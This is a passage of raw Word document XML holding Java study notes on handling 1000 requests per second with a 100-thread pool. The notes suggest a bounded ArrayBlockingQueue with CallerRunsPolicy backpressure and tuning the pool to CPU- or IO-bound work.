          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A6F565" w14:textId="4D9C623F" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📒</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Handling High Load with Thread Pool (1000 TPS vs 100 Threads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E211AFA" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3714C941" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread pool size</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: 100 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337993B0" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Incoming load</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: 1000 requests per second (TPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A238EF1" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00000000" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="4433A324">
          <v:rect id="_x0000_i1878" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="212FA2BF" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B834225" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Your </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>thread pool will be saturated quickly</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358D473B" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Only </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>100 requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be processed </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>concurrently</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F26858" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remaining </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>900 requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will go into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (if any), or be </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rejected</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if the queue is full.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7999BD80" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00000000" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="0C068355">
          <v:rect id="_x0000_i1879" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A07C6EC" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3767031B" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1) Use Bounded Queue + Backpressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EF0591" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bounded BlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., ArrayBlockingQueue) in ThreadPoolExecutor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB54E96" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If the queue is full, </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reject new requests</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>custom RejectedExecutionHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F94B232" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService executor = new ThreadPoolExecutor(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368522F9" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    100, 100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9B7935" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    0L, TimeUnit.MILLISECONDS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6385BC6B" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    new ArrayBlockingQueue&lt;&gt;(500), // limit queue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9A50BB" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    new ThreadPoolExecutor.CallerRunsPolicy() // simple backpressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6717D313" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18096223" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00000000" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="70E912E4">
          <v:rect id="_x0000_i1880" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B069136" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="00B758F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2) Tune Thread Pool Based on CPU/IO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FD9CD0" w14:textId="77777777" w:rsidR="00B758F9" w:rsidRPr="00B758F9" w:rsidRDefault="00B758F9" w:rsidP="0047282D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If tasks are </w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00B758F9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
